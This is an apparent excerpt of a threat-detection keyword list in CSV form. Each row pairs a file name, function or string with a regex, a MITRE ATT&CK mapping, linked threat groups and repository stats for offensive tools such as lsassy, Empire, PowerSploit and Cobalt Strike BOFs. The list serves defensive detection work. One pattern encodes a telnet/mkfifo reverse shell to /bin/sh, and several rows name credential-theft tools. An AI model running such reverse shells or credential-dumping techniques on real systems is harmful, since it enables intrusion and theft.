"*test_litefuzz.py*",".{0,1000}test_litefuzz\.py.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tool","https://github.com/sec-tools/litefuzz","1","1","N/A","N/A","7","1","68","9","2024-09-15T22:43:02Z","2021-09-17T14:40:07Z","61157"
"*test_lsassy.*",".{0,1000}test_lsassy\..{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","61158"
"*test_mitm_initialization.py*",".{0,1000}test_mitm_initialization\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","61159"
"*test_nanodump_exe*",".{0,1000}test_nanodump_exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","61160"
"*test_pacu_update.py*",".{0,1000}test_pacu_update\.py.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","61161"
"*test_tezos2john.py*",".{0,1000}test_tezos2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","61162"
"*TestConsoleApp_YSONET*",".{0,1000}TestConsoleApp_YSONET.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","1","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","61164"
"*Test-ContainsAmsiAstSignatures *",".{0,1000}Test\-ContainsAmsiAstSignatures\s.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","61165"
"*Test-ContainsAmsiPSTokenSignatures -*",".{0,1000}Test\-ContainsAmsiPSTokenSignatures\s\-.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","61166"
"*Test-ContainsAmsiSignatures *",".{0,1000}Test\-ContainsAmsiSignatures\s.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","61167"
"*Test-DllExists*",".{0,1000}Test\-DllExists.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","0","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","61168"
"*Test-DllExists*",".{0,1000}Test\-DllExists.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","61169"
"*tester@egress-assess.com*",".{0,1000}tester\@egress\-assess\.com.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","#email","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","61170"
"*tester12345678@gmail.com*",".{0,1000}tester12345678\@gmail\.com.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","#email","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","61171"
"*testHeapOverflow.*",".{0,1000}testHeapOverflow\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","61172"
"*Test-HijackableDll*",".{0,1000}Test\-HijackableDll.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","61173"
"*testing for SQL injection on (custom)*",".{0,1000}testing\sfor\sSQL\sinjection\son\s\(custom\).{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","#content","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","61174"
"*Testing Global Socket Relay Network*",".{0,1000}Testing\sGlobal\sSocket\sRelay\sNetwork.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#content #linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","61175"
"*testing.ssi.sh*",".{0,1000}testing\.ssi\.sh.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","1","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","61177"
"*test-iodine.log*",".{0,1000}test\-iodine\.log.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","N/A","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","61178"
"*TestMyPrivs.ps1*",".{0,1000}TestMyPrivs\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","61179"
"*Test-PasswordQuality -WeakPasswordHashesSortedFile *",".{0,1000}Test\-PasswordQuality\s\-WeakPasswordHashesSortedFile\s.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","COZY BEAR","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","N/A","AD Enumeration","10","10","1760","265","2025-04-16T18:12:55Z","2015-12-25T13:23:05Z","61180"
"*Tests communications to all of the known DNS-over-HTTPS communications providers*",".{0,1000}Tests\scommunications\sto\sall\sof\sthe\sknown\sDNS\-over\-HTTPS\scommunications\sproviders.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","61181"
"*Test-ServiceDaclPermission*",".{0,1000}Test\-ServiceDaclPermission.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","61182"
"*Test-ServiceDaclPermission*",".{0,1000}Test\-ServiceDaclPermission.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerUp.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","61183"
"*Test-ServiceDaclPermission*",".{0,1000}Test\-ServiceDaclPermission.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","61184"
"*TestWinRMMachines*",".{0,1000}TestWinRMMachines.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","61185"
"*tevora-threat/SharpView/*",".{0,1000}tevora\-threat\/SharpView\/.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","Conti - APT29","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","N/A","10","10","1032","196","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z","61186"
"*text_to_shellcode\*.exe*",".{0,1000}text_to_shellcode\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/DallasFR/WinShellcode","1","0","N/A","N/A","N/A","","N/A","","","","61187"
"*TexttoExe.ps1*",".{0,1000}TexttoExe\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","61188"
"*tezos2john.py*",".{0,1000}tezos2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","61189"
"*TF=*mkfifo * && telnet * 0<*| /bin/sh 1>*",".{0,1000}TF\=.{0,1000}mkfifo\s.{0,1000}\s\&\&\stelnet\s.{0,1000}\s0\<.{0,1000}\|\s\/bin\/sh\s1\>.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","#linux","N/A","3","10","29","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z","61190"
"*TGlzdHMgYWxsIGF2YWlsYWJsZSBwcm92aWRlcnMgY3JlZGVudGlhbHM=*",".{0,1000}TGlzdHMgYWxsIGF2YWlsYWJsZSBwcm92aWRlcnMgY3JlZGVudGlhbHM\=.{0,1000}","offensive_tool_keyword","BetterSafetyKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","61191"
"*TGlzdHMgYWxsIGF2YWlsYWJsZSBwcm92aWRlcnMgY3JlZGVudGlhbHM=*",".{0,1000}TGlzdHMgYWxsIGF2YWlsYWJsZSBwcm92aWRlcnMgY3JlZGVudGlhbHM\=.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","61192"
"*tgs::ask /tgt:*",".{0,1000}tgs\:\:ask\s\/tgt\:.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","0","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","61193"
"*tgscrack.go*",".{0,1000}tgscrack\.go.{0,1000}","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","1","N/A","N/A","N/A","3","202","58","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z","61194"
"*tgsrepcrack.*",".{0,1000}tgsrepcrack\..{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Crack with TGSRepCrack","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","61195"
"*tgsrepcrack.py*",".{0,1000}tgsrepcrack\.py.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","N/A","10","1433","317","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z","61196"
"*TGSThief-main*",".{0,1000}TGSThief\-main.{0,1000}","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","N/A","9","2","181","27","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z","61197"
"*TGT_backdoor_svc*",".{0,1000}TGT_backdoor_svc.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","61198"
"*TGT_Monitor -EncryptionKey *",".{0,1000}TGT_Monitor\s\-EncryptionKey\s.{0,1000}","offensive_tool_keyword","TGT_Monitor","This script continuously monitors cache for new TGTs and displays them on the screen (admin privs required)","T1557.001 - T1040","TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/TGT_Monitor","1","0","N/A","N/A","9","1","3","0","2023-11-08T18:48:55Z","2023-11-07T22:53:45Z","61199"
"*TGT_Monitor.ps1*",".{0,1000}TGT_Monitor\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","61200"
"*tgtdeleg /nowrap*",".{0,1000}tgtdeleg\s\/nowrap.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","61201"
"*tgtdelegation *",".{0,1000}tgtdelegation\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","61202"
"*tgtdelegation.cna*",".{0,1000}tgtdelegation\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","61203"
"*tgtdelegation.x64*",".{0,1000}tgtdelegation\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","61204"
